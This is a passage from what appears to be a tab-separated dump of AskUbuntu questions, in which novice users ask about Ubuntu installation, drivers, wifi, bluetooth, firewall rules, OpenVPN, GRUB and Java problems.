xarchiver , the permissions are listed as `` -rwxr-xr-x '' but not after the decompression . other infos : psyc0p4th @ psyc0p4th-x550ca : / $ mount /dev/sda3 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/cgroup type tmpfs ( rw ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) none on /sys/firmware/efi/efivars type efivarfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) none on /run/user type tmpfs ( rw , noexec , nosuid , nodev , size=104857600 , mode=0755 ) none on /sys/fs/pstore type pstore ( rw ) /dev/sda1 on /boot/efi type vfat ( rw ) systemd on /sys/fs/cgroup/systemd type cgroup ( rw , noexec , nosuid , nodev , none , name=systemd ) gvfsd-fuse on /run/user/1000/gvfs type fuse.gvfsd-fuse ( rw , nosuid , nodev , user=psyc0p4th ) /dev/sr0 on /media/psyc0p4th/perfect stranger type udf ( ro , nosuid , nodev , uid=1000 , gid=1000 , iocharset=utf8 , umask=0077 , uhelper=udisks2 ) /dev/sda6 on /media/psyc0p4th/data type fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 ) /dev/sda7 on /media/psyc0p4th/restore type fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 ) /dev/sda2 on /media/psyc0p4th/recovery type fuseblk ( rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 ) psyc0p4th @ psyc0p4th-x550ca : / $ arch x86_64 i also tried doing all of that logged in as root , no result . i 've been using linux for about a month now , so i 'm pretty new to all this , if you need any other informations just ask . thanks for everything .
425313	way to check for corrupt os installation	i recently had ubuntu 13.10 installed and i ran shred and i reinstalled ubuntu 13.10 . the original installation worked fine with no issues . this installation i 've had errors installing stuff that i installed flawlessly with the old installation . i used a different ubuntu 13.10 disc for this installation . i found this one that i made a while ago cause i misplaced the disc i used to install it the first time . i looked at the disc after i noticed the first glitchy error i received , and it was scratched . so i 'm assuming it is a bad install . so is there a way i can i can check to see if parts of the install are corrupt before i burn a new dvd with ubuntu 13.10 installed on it . i spent all day today trying to install the stuff i had on my previous install . please help .
425315	ubuntu touch ; how do i import .vcf contacts ?	i have just got ubuntu touch up and running on my phone ( nexus 4 ) and am enjoying it ! i have got my photos and music onto it , but i can not find how to import my .vcf contacts file . i have read all the articles i can find on the subject and they only have instructions for importing contacts from google , but that is useless for me . i have searched askubuntu to no avail .
425316	ubuntu 13.10 driver for lexmark c543dn	i have a lexmark c543dn that shares the same home network as my ubuntu 13.10 thinkpad ( z61t ) . when i installed 13.10 , ubuntu found the 543dn fine and automatically installed would appeared to be a generic printer driver . problem is that whenever i try to print anything , the computer becomes slow and unresponsive and in many instances , i need to do a hard reboot to recover . and the printing process takes forever . i went to the lexmark website and the only driver that they had for devon/linux ( ? ) resulted in the following error message : `` archive manager an error occurred while loading the archive '' after it appeared that i had successfully downloaded the file . it appears that the print driver loaded by ubuntu is in conflict with the os and that is causing the processor being taken over and the slow printing . appreciate any suggestions to resolve . thanks .
425317	unity web player for ubuntu ?	there are various apps on the internet that require the use of unity web player and am rather curious if i could find a way around it to make it work . i tried the following as only these i found : enabling the `` unity 3d plugin '' after installing pipelight using instructions from their website installing firefox in wine and while running it using wine the unity web player the one with which i got the closest to the wanted result was the second one : it loads normally when opening an app that requires it , but fails when up to 99 % because it is unable to update . any solution ?
425318	eclipse crashes with x window system error using nx - cairo the solution ?	ever since i 've started logging into my system using the freenx server , i can no longer edit project files with eclipse . it will crash when i attempt to click anywhere in the code , with the error : the program 'eclipse ' received an x window system error . this probably reflects a bug in the program . the error was 'badvalue ( integer parameter out of range for operation ) ' . ( details : serial 39071 error_code 2 request_code 149 minor_code 26 ) ( note to programmers : normally , x errors are reported asynchronously ; that is , you will receive the error a while after causing it . to debug your program , run it with the -- sync command line option to change this behavior . you can then get a meaningful backtrace from your debugger if you break on the gdk_x_error ( ) function . ) some googling revealed that i may need to install xulrunner 10.0.2 for eclipse to function ... i have done so , and after editing eclipse 's config file , it will continue to crash . another solution , posted on eclipse 's bugtracker and relating specifically to using it with nx , reports that updating to > = cairo 1.12.10 may fix the issue - unfortunately , ubuntu precise ( what i 'm using ) is only on cairo 1.10 . is there any way get have apt start using the newer stable versions on the ( cairo ) repo , instead of upgrading my entire system ?
425322	constantly prompted to enter wifi password with a broadcom bcm4323	our last router worked just fine , i stayed connected to it wirelessly flawlessly ( using ubuntu 12.04 and ndiswrapper ) . i installed our new router and now i ca n't connect to it at all . all 4 mobile devices , the ps3 , and our laptop works on it perfectly but my linux desktop does not . when i try to connect to it it 'll seem like it 's connecting to it for around 30 seconds then prompt me to enter the password again ( i am entering the correct password for the router ) , it does n't connect and the cycle continues . i have allowed all users to use the network , i have saved the password , i have deleted the keywrings in the keywring folder and created a new keywring folder ( do n't give me flack for that , no one that 's untrusted will be coming onto my computer ) , i have rebooted my router , i have deleted the network in my connections , rebooted then connected again and after all of this the same damn thing happens . i 'm going to repeat this , the last router worked flawlessly . any help would be greatly appreciated . system info : pentium 4 @ 3ghz 1.5gb 400mhz ram geforce fx 5200 ubuntu 12.04 wifi adapter is netgear wnda3100 here is my wireless info : http : //pastebin.com/8arapvuq here is what i have tried so far : changing the network name did nothing . i changed it to `` wood '' so that 's pretty simple . i also ran a firmware update on the router , yielded no results .
425324	dovecot & mysql	i 'm following this install/configuration to get support of virtual users with postfix/dovecot . i 'm stuck at the required update of /etc/dovecot/conf.d/auth-sql.conf.ext - which does not exist on my system ( ubuntu 12.04.4 lts ) . i do have /etc/dovecot/dovecot-sql.conf.ext which looks similar . but i do n't understand why i do n't have /etc/dovecot/conf.d/auth-sql.conf.ext , even though i did all of the required installs . can anyone tell me which install should have created /etc/dovecot/conf.d/auth-sql.conf.ext ?
425326	clock not available after update on 13.10 and greyed out unable to access settings	clock not available after update on 13.10 and greyed out unable to access settings . not terribly important but annoying the clock is no longer displayed after updates .
425327	ca n't change to document directory	i 'm brand new to linux , and know pretty much nothing . i wanted to learn about the linux terminal and started watching a video , the video showed how to switch directories and they switched to the documents directory . i tried both `` cd /documents '' and `` cd documents '' both of which said the same error message . `` no such file or directory '' . i am really sorry for my lack of knowledge , i hope i can get this sorted . thanks in advance guys : )
425328	play on linux , steam games	i have installed pol and i have also installed steam . i want to use the windows client rather than the linux client because i doubt very much the games i have will be available on linux client yet . anyway , i have heard that i should use different prefixes for every game/application i install . what 's the best way to do this for steam games ?
425331	my external hard drive ubuntu wo n't appear	alrighty alrighty . i 've been using the big m operating system quite a lot , but since two months , my internal hard drive died . of course i 'd like to change it , but i have other priorities . for the moment , i 'm using a live usb ubuntu as a replacement for windows ( even though it 's not really convenient not having half of my windows software ) and the truth is , i 'm getting quite annoyed by the fact that it does only have a few mb of memory , so i tried to format my ehd , and install ubuntu on it . from within the live usb ( or more likely live sd card ) the installation worked really fine , it apparently installed correctly . but when i 'm on the boot menu of the bios , i ca n't see either my external hard drive on which is installed ubuntu , or the other external hard drive . the main hard drive is listed , my ubuntu live usb is listed , my kali linux live cd is listed , but not the ehd . it appears fine when i 'm on ubuntu live usb . i installed ubuntu 13.10 on a seagate backup bk+ , and my computer is a packard bell onetwo -which model , i do n't know- also , the grub is installed on the failing drive , but it is n't at fault , i already tried it , and it just said to me that he could n't find the hard drive on which was installed ubuntu . i got the no such device : grub rescue error . i used the default installation process , and i did not partition my drive myself . maybe that 's what in cause . i did n't check , but i 'm not sure that i made a swap partition . except if the installer takes care of it itself . a screenshot of my hard drives , since i 'm not allowed to post images . these are my drives . the 500 gb western digital failing is my internal . the cd drive is my kali linux live cd . the selected one is the seagate on which is installed ubuntu . the 500 gb one is just a hard drive with data . ntfs formatted . the 2.0 gb drive is my live usb sd card . i hope someone can help me , and thanks anyways .
425333	how to make aptx-capable bluetooth equipment work with ubuntu ?	i have an aptx-capable headset and i want to use it to play music with the highest possible audio quality the headset can technically provide in ubuntu . how can i do that ? while a2dp supports a lot of codecs optionally and is extensible to support other manufacturer-defined codecs . aptx does not only boast to provide better audio quality than the competition , but also advertises to reduce delay to have lip sync audio when watching videos . here are my questions : how can i make aptx-capable bluetooth equipment use this codec in ubuntu ? what solutions are available ? how can i check and verify an established connection for the codec it uses ? i 'd like to point out , while this may look like a sponsored post , it is not . in my opinion flac and opus should be the gold standard , but to my knowledge devices with support for these codecs are n't available right now .
425336	how do i verify the integrity of my installation ?	i installed a fresh xubuntu 13.10 , and at the end of the installation , it requested a restart . just before the restart , a fatal error or something occurred . is there an event log i can check to make sure my installation is ok ? there was n't enough time to read the fatal error . how do i verify the integrity of my installation ? so following up on a possibly bad installation -- it 's asking me to remove many many packages , including xubuntu-desktop if i want to install ndiswrapper . is that a flag telling me the installation was bad ? something was definitely wrong with my installation . i did a fresh install again , and everything seems to be fine . the question still holds though ^
425337	no bluetooth adapters found ! please help !	i have a dell inspiron one that had windows 7 . i 'm now using ubuntu 13.10 . i have searched all over for a answer to why i ca n't connect any of my bluetooth devices , maninly my auvio speakerto my computer , and have tried many methods but none work . i have downloaded bluetooth manger and other things and still no veil . please help me , and thank you for your time if you help .
425339	can not move mouse or use keyboard in ubuntu	so i just got ubuntu 13.10 so i could backup my files on my non booting computer and then format the hard drive and reinstall windows . but when i booted it off a live usb i can not move my mouse or type on the keyboard at all . i asked a similar question a few hours ago but people recommended i update to 13.10 for better support . i updated but it didnt fix my problem at all . also when i was on 12.10 it showed the mouse cursor but now on 13.10 it isnt . i have a laptop so i have a touchpad but , i also have a logitech mouse . ubuntu is n't sensing either . computer : toshiba satellite l855d series l855d-00l ( pskgec-00l007 ) graphics : amd radeon hd 7640g ubuntu : 13.10
425343	is there a way to set the homescreen wallpapers on the ubuntu homepage for mobile devices ?	like i think the option is cool to have to see all the multitasking apps you have opened and stuff but it seems all to familiar with blackberry which you ca n't change the home screen wallpaper just the lock screen . i think it 'd be a great feature if ubuntu made this optional to switch back and forth between which screens you wanted to see in the settings menu for the home screen . because after a while just viewing the apps on the home screen would get kinda boring to see after while .
425351	where can i put commands that i want to run for all interactive , non-login shells ?	normally , in bash , the answer would be ~/.bashrc or /etc/bash.bashrc . but unfortunately ubuntu is sourcing these files from ~/.profile and /etc/profile respectively . so , where should i put such commands on ubuntu ? see also why is /etc/profile not invoked for non-login shells ? if you are not familiar with these files .
425352	how to install ubuntu on hp chromebook 14	i have a hp chromebook 14 that i just installed linux on . i am completely unfamiliar with linux and how to install the packages i need . i want to run itunes and other .exe programs . currently i have xfce as my interface . i just noticed someone else posted a similar question . so what desktop environment do i need to install ?
425354	assigning ram in a virtual machine	this is probably a really dumb question , but i want to be sure before i give my virtual machine memory . i 'm going to try to install linux on my mac through virtual box but i need to allocate ram for it . my question is this : when the virtual machine is not in use , does it return the ram back to my system for whatever it needs ? or does it keep the ram reserved like partitioning a hard drive ? thanks !
425355	error authenticating some packages while upgrade	when i try to upgrade my ubuntu 13.04 to 13.10 , it gives the following error : it was not possible to authenticate some packages . this may be a transient network problem . you may want to try again later . see below for a list of unauthenticated packages . also while downloading the files , i see such errors like : err http : //in.archive.ubuntu.com saucy-backports/restricted translation-en_in i tried the link to a similar question but that does not work . i do n't think i have any troubles with the keys .
425359	virtualbox ubuntu 13.10 full screen is black	i am running ubuntu 13.10 on virtualbox 4.3.6 with windows 8.1 as my host . this has been running flawlessly for me until yesterday when i went to full screen and noticed the display just went black , and stayed black even after i left full screen ( i have to close virtualbox ) . i 'm allowing ubuntu 1gb of ram , 128 mb of video memory , and have enabled 3d . to clarify , i have the guest additions installed , and it used to work in fullscreen beautifully . i tried loading snapshots of long before this occured , and they are suffering the same fate ; i truly can not figure out what is happening . has anyone experienced this and could give me some ideas about how to fix this ?
425365	how do i continue past the `` where are you ? '' screen when installing ?	i want to install ubuntu 13.10 in a hyper-v virtual machine . however , i ca n't press the continue button when i get to the `` where are you ? '' screen . how do i solve this problem ?
425368	i need a guide on the use of the script to install ubuntu on my arm chromebook	this guy , mentioned this script , in this answer - but i need instructions on how to use it ! edit in re : to comment/duplicate marks.. unfortunately that script is the only one i know of , and it is n't for 13.10 ( assuming that version works on arm procs ) . this is not a duplicate , please go buy yourselves some reading comprehension , kthxbai
425369	ca n't get ufw firewall to allow anything	i 'm trying to set ufw ( using gufw ) to create a firewall that only allows network connections when openvpn is connected . so in gufw i deny incoming and outgoing connections and enable the firewall . i then create a rule that allows incoming/outgoing of the openvpn service . interestingly , with these settings i 'm able to make a vpn connection using network connections , however i 'm unable to browse . note that without these rules i 'm unable to make the vpn connection . i 've also tried creating a rule using the openvpn ports and vpn ip address with no success . to troubleshoot , i delete those rules and create more broad rules of allowing incoming/outgoing http and https . with these rules in place , i 'm still unable to browse online . i tried this while creating rules with my ip address , and no luck . here 's an example of my current rules , which is not allowing me to browse . user1 @ vuser-pc1 : ~ $ sudo ufw status status : active to action from -- -- -- -- -- -- 80/tcp allow anywhere 443/tcp allow anywhere 80/tcp allow anywhere ( v6 ) 443/tcp allow anywhere ( v6 ) 80/tcp allow out anywhere 443/tcp allow out anywhere 80/tcp allow out anywhere ( v6 ) 443/tcp allow out anywhere ( v6 ) is there something i 'm doing wrong ? edit : if i set `` allow '' outgoing , and then create rules to disallow http/https connections , the rules work . i can not browse . it is strange to me that in this case the rules work to disallow , but i ca n't get it to allow .
425371	how to run gui applications remotely on a headless server ?	i 'm new to ubuntu - sorry for novice questions . what i have - is ubuntu server , to which i have access only via ftp and putty . what i would like to do - is to run firefox ( or any other browser ) from that ubuntu machine . i 've managed to install firefox , but when i 'm trying to run something like this : x-www-browser http : //google.com it is saying : error : no display specified i do n't understand - there is no display at all at ubuntu sever - it is just computer case on rack , the only display i have - is mine . do n't know , how to redirect this display output to my machine ( if this is possible at all ) .
425374	i ca n't find the software drivers from additional drivers for lenovo ideapad z510	i have a lenovo ideapad z510 laptop . when i open additional drivers and search for drivers , i ca n't find any drivers listed there . is this because i do n't need any additional drivers for my laptop or do i need to download additional drivers for my laptop from a third party software source ?
425376	brightness stuck at full after suspend hp pavilion g6 12.04	i have an ongoing problem with my linux install where brightness seems to get stuck at full after my laptop suspends . before suspend , the hotkeys work fine . after suspend the hotkeys still bring up the brightness indicator , but despite the bar going up and down , the brightness does n't actually change . likewise , the terminal commands do n't have any effect . i 've tried all sorts of different settings in grub but that only seems to disable my ability to change the brightness entirely . are there any other ideas out there or any options i have to narrow down what the issue might be ?
425379	installing ubuntu , `` mode not supported ''	when i try to install ubuntu onto an older xp machine . it boots to the flash drive then the displau goes away and says that the mode isnt spported ... i am assuming it means video mode meaning the ratio ? any ideas ?
425383	what are the compilation steps for firefox ?	i have changed the code of mozilla firefox in /usr/lib64/firefox/omni.ja . now , i want to compile firefox so that the changes will get effect .
425392	openvpn tls error : tls handshake failed	tls error : tls handshake failed what ports need to be open for openvpn to work ? server port 1194 proto udp server-bridge 192.168.1.104 255.255.255.0 192.168.1.160 192.168.1.170 dev tap0 ca ca.crt cert server.crt tun-mtu 1454 key server.key dh dh1024.pem up `` /etc/openvpn/up.sh br0 '' down `` /etc/openvpn/down.sh br0 '' ifconfig-pool-persist ipp.txt keepalive 10 600 comp-lzo persist-key persist-tun verb 3 mute 20 status openvpn-status.log client-config-dir ccd client-to-client client : client configuration file for openvpn client : dev tap remote servername.com 1194 nobind resolv-retry infinite persist-key persist-tun ca ca.crt cert client.crt key client.key tls-auth ta.key 1 cipher bf-cbc comp-lzo verb 3
425394	how do i turn off edge scrolling ?	how do i turn off edge scrolling ? i went to the touchpad settings and none of the choices would turn it off .
425395	how do i get the new hostname into syslog after changing the hostname ?	when i installed ubuntu i named my computer `` test '' after the installation was finished , i renamed the hostname to somewhat nicer : sudo hostname silversurfer and i added the hostname to /etc/hosts but still even after a reboot , in syslog all messages are preceeded by `` test '' : tail -f /var/log/syslog feb 24 04:51:28 test ntpd [ 4598 ] : peers refreshed feb 24 04:51:28 test ntpd [ 4598 ] : listening on routing socket on fd # 24 for interface updates ... my /etc/hosts/ looks like this : 127.0.0.1 localhost 127.0.1.1 test silversurfer # the following lines are desirable for ipv6 capable hosts : :1 ip6-localhost ip6-loopback fe00 : :0 ip6-localnet ff00 : :0 ip6-mcastprefix ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters
425396	how do i get my laptop back to windows 8 from ubuntu 12.10 ?	so i thought it would be fun to try a new os . i tried to pair ubuntu with my windows 8 asus laptop . for some reason it did n't work , so i downloaded the usb boot version ( i think it is 12.10 ) . after figuring out how to boot my laptop from usb , the installation went great and ubuntu works very smoothly . now i want to go back into windows 8 , but when i get to the boot menu , both the windows 8 options do not work . how can i get back into windows 8 ? also i should mention that i do not know much about computer lingo so if you could spell it out for me like i was 5 years old , that would be awesome ! any help you can give is much appreciated !
425404	sage : saving .show ( ) output as vector graphic	i am using sage to make visual representations of graphs ( ie of the vertex and edge variety ) via the show command . however as far as i can tell i can only save these as a raster in the form of a png or jpeg ? i have been a vector graphic snob as of late and would like to save graphs as pdf like i can regular plots . is this possible ? thanks !
425405	stuck at the grub screen	i live in a region of frequent power cuts.so sometimes there is a power cut when i am starting my computer.the problem is whenever there is a power cut while booting then when i on my computer once again i am stuck at a purple screen which shows various boot options . there is no timer and the only solution i have for this is re-installing the system.this is annoying because it leads to a lot of data loss.all what i saved is lost and i have to start everything from scratch . please tell me a solution for this.thanks in advance .
425407	ububntu 13.10 x64 swap	i 'm using ubuntu 13.10 64 bit . established a system by default , compliance , sisema allocated to swap 35gb file . how to reduce size swap file ?
425409	thumbnails in dial	how can i stop the new thumbnails being generated to the `` speed dial '' , ( sorry do n't know the lubuntu name for it ) , and how can i change the background/wallpaper in that dial please ? ... simple way for a simple mind please ? o.k . sorry , i should have said it 's the firefox `` speed dial ''
425410	i bought desktop/server 12.04 lts bundle to install on laptop . was this ok ?	total noob . i have several old hp laptops and need to gain exposure to linux , so i bought desktop/server 12.04 lts bundle last year . i plan to install fresh hd and run ubuntu as sole os . my question has been answered ... wrong software for my immediate goals . thanks ! thanks for ya'lls patience with me . tom
425412	problems in ubuntu 12.04 installing in pre-installed windows8 and upgraded to 8.1	from the last one month i 'm trying to install ubuntu 12.04 in windows 8.1 pre-installed ( dual boot ) . i 've done following things ... i downloaded 'iso ' images from ubuntu website and booted through usb ( i 'm using netbootin windows 585 ) . i tried 'try ubuntu without installation ' but it showing command prompt instead of regular desktop ( ex : ubuntu-desktop $ : ) then i used 'startx ' but gave me complete black screen without any prompts . surprisingly when i try to install ubuntu13.10 it is showing 'your computer running on low graphics mode ' that 's it no options working here onwards . i brought ubuntu 12.04 cd which is working in my friend pc . it also showing same 'command prompt ' error . but all the cases when i installed directly means ( install ubuntu ) option it is successfully installed but when i opened it is showing 'grub ' prompt . note : after installation it is showing this command prompt . gnu grub version 1.99-21 ubuntu3.14 grub > here if i press it displays some commands . i do n't know how to use those commands . please help me i searched in ubuntu for this grub prompt they mentioned use boot-repair tool in live ubuntu but my only problem is i 'm unable to use that option . note : i 've created separate partition in windows and in that partition i 'm trying to install this ubuntu thank you and please help me to solve this issue .
425414	can not connect to wifi in ubuntu but i can connect to same network wiht different os	i have two operating sysytems on my laptop which are windows and ubuntu . i can connect to wifi in windows but can not while using ubuntu .the same password is indicated as wrong one i dont know what to do any one please help me
425415	is my cryptswap working ?	i was receiving a message saying that cryptswap can not be mounted . after several reboots , i do not have this message displayed anymore . is it normal ( see below ) for 0 to be used ? $ swapon -s filename type size used priority /dev/mapper/cryptswap1 partition 6194172 0 -1 free -m total used free shared buffers cached mem : 5875 1476 4398 0 50 731 -/+ buffers/cache : 695 5180 swap : 6048 0 6048
425417	install ubuntu touch to my xperia l	i have a phone and its run android 4.1 ( jelly bean ) i just bought it on 02/19/2013 i interested to try ubuntu touch in this device so my question is , if ubuntu touch just can be run in android google nexus are the ubuntu can be run at my android sony experia l ? please answer
425419	monitor turns off ( blank screen ) after grub only sometimes	i have a desktop computer which dual boots windows and linux . i have run fedora for some time now but i wanted to try ubuntu . so i installed ubuntu via a usb drive and everything seemed smooth and the install was successful . however i am having an intermittent problem during boot . sometimes ( 50 % or greater ) when i 'm booting , after grub my monitor will go blank and it will say hdmi no signal as if suddenly the video output from my graphics card just stopped . my monitor appears as it does when my computer is powered off . i 've also tried dvi with the same results . if selected in grub windows still boots up and works properly , and fedora worked properly before this . also , when ubuntu does boot up everything works flawlessly and i really like it . so i 'd like to figure this out . i 'm using a amd radeon hd 7970 with the open-source driver . it 's always worked well for non game workloads in the ( recent ) past . any suggestions i can try , or steps i can take to try to troubleshoot this problem would be very appreciated . thanks .
425421	13+ minute boot	ubuntu 12.04 lts boot time more than 13 minutes , and often i do not see the text at the upper right part of the screen ( calendar , settings , etc ) . i can get the text back by logging out and back in . using dmesg , i see : info : task gnome-session:1186 blocked for more than 120 seconds several times during the long boot process . any ideas or things i can try ? i am new to ubuntu , so i will need details . thank you , joe
425424	how to use modulo function to determine if the given year is a leap yaer or not in vi editor of linux	i am not able to run a program in vi-editor of linux which is to determine whether the entered year is a leap year or not so i require necessary directions in order to execute my program . thank you
425427	how to install perl , php , mysql and ruby packages on ubuntu	i need to work on perl , php , mysql , and ruby software on ubuntu . are these already installed on ubuntu or do these packages need to be installed ? i am using ubuntu 12.04 .
425428	dell inspiron 14r display problem- tried everything	i know there are a million posts about this , but i have been on this forum for hours and have n't found a solution to my problem . like many people , my brightness keys do n't work and i am looking for a different way to adjust my brightness . i have tried xrandr -- output lvds1 -- brightness which actually does something but really only jacks up my contrast . i have tried sudo setpci -s 00:02.0 f4.b=00 and sudo setpci -s 00:02.0 f4.b=ff and nothing happened at all . i have also tried the app xbacklight which did n't do anything and fiddling with dconf-editor , which i do n't think will be able to solve my problem . i am very new to ubuntu so any help would be much appreciated .
425433	skype 4.2 webcam is green	i already install video4linux control panel and i already adjust the settings but the adjusted settings do n't work for skype . the video was still green . how can i fix this ? i 'm using ubuntu 12.04 lts on lenovo s10-3 .
425434	nividia temprature in 13.10 so high	i had prpblem with the laptop tempreature with ubuntu 13.10 and nvidia card nvs500m after searching i found i can add the following line to the xorg.conf option `` registrydwords '' `` powermizerenable=0x1 ; perflevelsrc=0x2222 ; powermizerlevel=0x2 ; powermizerdefault=0x2 ; powermizerdefaultac=0x2 '' it solved the issue for the temprature but applications starts to crash in randome way so i removed the xorg.conf and restarted the laptop and found every thing back to normal and the temprature also .. so my question is , is there another safer way to control the powermizer of nividai to usethe low level of performance but without crashing any thing
425439	ubuntu 12.04 sever is running slow and not using full ram	i have a ubuntu vm of 12.04 server virsion and it is running on centos . vm have 8gb of ram and 1 core processor for it . i amd running following application on it hadoop 1.0.4 hbase-0.94.12 intellicus ( bi tool ) i observe a strange problem with my system all the application are running very slow . here is the output of some commands i fired free -m total used free shared buffers cached mem : 7987 2351 5635 0 166 894 -/+ buffers/cache : 1290 6697 swap : 4091 0 4091 i have preload installed on it for performance boost but nothing really working for me and the host is having sufficient memory approx 23 gb free . how can i increase the ram and run them faster i have heard that incense the ram and application will run faster but it is n't true i have seen the similar question here but not working in my case
425440	java -jar arguments being ignored	i 'm using ubuntu 13.10 and oracle java 1.6.0_45 ( need the oracle version for some development work i 'm doing ) . i can recreate this problem with nearly any jar file but the specific one is with a modded minecraft server . i run the following script to start my server : screen -s minecraft java -xms3g -xmx6g -xx : permsize=512m -jar ftbserver-1.6.4-965.jar nogui the script worked fine yesterday but today practically none of the arguments are followed when i run that script . if run over ssh the script works without a problem . however , when run locally the gui opens and the memory allocation is set to around 1 gig . i did a manual install of java 1.6 , i had originally created a .desktop file ( /usr/share/applications ) for jar files so i could associate them with java and run them . i removed that file when i first saw this problem and that seemed to fix it , until today . i do not have any other instances of java or open java installed on the system . any ideas why this might be happening ? thanks in advance , will
425442	how do install sun java wireless toolkit on ubuntu 13:10 ?	kindly bear with me , as i am new to ubuntu . i finally successfully installed java se ( on my ubuntu 13.10 . 64 bit machine ) following the instructions from how do i get oracle java se 7 to work ? this was a scary experience as many of my applications disappeared during the process . anyway , now that i have java se working perfectly well , i need help on installing sun java wireless toolkit on the same machine ( ubuntu 13.10 , 64 bit ) . looking forward to you help .
425445	everpad installation error , pkg_resources.distributionnotfound : pyside	i have installed everpad a client for evernote by following way in my ubuntu 12.04lts 32bit but i am getting the following error , can anybody fix this . sudo add-apt-repository ppa : nvbn-rm/ppa sudo apt-get update sudo apt-get install everpad when i am typing $ everpad in terminal i am getting this error : traceback ( most recent call last ) : file `` /usr/bin/everpad '' , line 5 , in < module > from pkg_resources import load_entry_point file `` /usr/local/lib/python2.7/dist-packages/pkg_resources.py '' , line 2735 , in < module > working_set.require ( __requires__ ) file `` /usr/local/lib/python2.7/dist-packages/pkg_resources.py '' , line 690 , in require needed = self.resolve ( parse_requirements ( requirements ) ) file `` /usr/local/lib/python2.7/dist-packages/pkg_resources.py '' , line 588 , in resolve raise distributionnotfound ( req ) pkg_resources.distributionnotfound : pyside
425447	high availability distributed proxy server	i am trying to setup a distributed high availability proxy . each proxy server should be located at different regions . dhcp server can be used to inform the client machines to use proxy server which is available . can you suggest a suitable method or some helpful links ? when i checked , solutions are available with heartbeat and haproxy but i am not sure how it will work if the servers are located in different regions . thank you
425448	file type associations gone wild	i have installed ubuntu 13.10 ( desktop , 64bit ) on different machines . however , after installing the most recent version of google chrome browser and wine i do always get a mess with a lot of file type associations : folders and archives - > chrome browser ( results in again downloading them from disk ) textfiles , tex , ... - > wine notepad png , jpg , ... - > wine internet explorer pdf - > gimp maybe some more meanwhile other file type associations stay correct : odt , odp , ... - > libreoffice eps - > document viewer most others is there a simple trick to tell ubuntu to go back to default file type associations without searching for everything which fails and correcting it by hand ? note : i have n't observe this behavior on the 32bit version .
425449	ubuntu boots only out of installer : all boot options are tried	i have ativ 9 lite , on which i have installed the ubuntu ( gnome ) 14.04 daily . i after i complete the install and restart using the option offered at the end of the installation procedure , ubuntu boots fine ( from the ssd ) . however , if i now restart ( or start from cold ) it gives the error : all boot options are tried . press f4 key to recover with factory image using recovery or any other keys for next boot loop iteration . i have a efi ( with boot flag ) and a / partition . the firmware boot order list is empty . i have set both secure boot and fast boot to disabled , and the firmware looks for both uefi and csm . how do i make the firmware find ubuntu , as the installer also could ? here is my boot-repair output : http : //paste.ubuntu.com/6986125/
425450	trouble instaling ubuntu on dell mini	i pulled the hdd out and put it in another laptop and wiped it clean . i 'm not trying to install from a usb using penlinux . it allows me to run ubuntu from the usb but it 's been trying to install for 24 hours now and is still on the first install screen . please help .
425452	nvidia configuration file	i 'm tring to configure nvidia powermizer using the xorg.conf . but that made applications crash so does nvidia use the xorg.conf or it uses another file ?
425453	trying to install eclipse kepler with oracle java7	when trying to install eclipse kepler with oracle java7 , i 'm getting the below error : eclipse/plugins/org.eclipse.jsch.core.source_1.1.400.v20111202-1616.jar eclipse/plugins/org.eclipse.equinox.p2.repository_2.3.0.v20130412-2032.jar eclipse/plugins/org.eclipse.ui.browser.source_3.4.100.v20130527-1656.jar eclipse/plugins/org.eclipse.equinox.http.servlet.source_1.1.400.v20130418-1354.jar eclipse/plugins/org.eclipse.core.databinding.observable_1.4.1.v20130515-1857.jar eclipse/plugins/org.eclipse.pde.build.source_3.8.100.v20130514-1028.jar eclipse/plugins/org.apache.lucene.core_3.5.0.v20120725-1805.jar gzip : stdin : unexpected end of file tar : unexpected eof in archive tar : unexpected eof in archive tar : error is not recoverable : exiting now
425454	google chrome does n't install	i 've just recently installed ubuntu alongside windows using file mount audit . i 'm just using a 32 bit ubuntu and downloaded a 32 bit chrome for it but couldn't install it , i always receive `` bad architecture `` message each time i install it . i already checked if i got 32 bit chrome and yes it is . does the issue have something to do with the way i installed ubuntu ?
425463	multi monitor on a macbook pro retina 11,3 ( late 2013 ) with nvidia	does this mac have something like optimus for switching between the intel and nvidia card ? do you know if multimonitor works , connecting two monitors to each thunderbolt port ( two external monitors + integrated lcd screen ) . i come from an optimus laptop , and it was a nightmare , i want to use the nvidia card as a primary gpu . it would be great to know if the laptop runs hot on nvidia and how long the battery lasts .
425464	how do i make configure detect software in different directories ?	i wanted to install wine as a non root user into my home folder . but when i used ./configure it gave the output configure : error : no suitable flex found . please install the 'flex ' package . so i installed flex as non-root in one of my directories but still the above error message persists . how do i make configure detect the flex i have installed ?
425467	how to make mobile broadband option visible when it get hidden in ubuntu ?	i have ubuntu 13.04 in my laptop . the mobile broadband option in the task bar was got hidden somehow . how can i make it visible ?
425471	chrome browser packages for armv7a-vfp-neon	i am looking for chromium-codecs-ffmpeg-extra packages ( .ipk ) for the architecture armv7a-vfp-neon . i was able to find the ipks for armel architecture on the following link : https : //launchpad.net/ubuntu/precise/armel/chromium-codecs-ffmpeg-extra/13.0.782.215~r97094-0ubuntu2 but , these packages fail to install on my board , which supports only armv7a-vfp-neon . can you please help me out with this ? or can i somehow install armel packages on armv7a-vfp-neon architecture ?
425474	how to install bsnl 3g modem in ubuntu 12.04	i have installed ubuntu 12.04 . i have bsnl 3g modem which works well on windows 7 . when i try to work it with ubuntu the device itself not detected . i tried the command lsusb , my device name and details not displaying . what should i do next ? the device still works in windows 7 - how can i get it working in ubuntu also ?
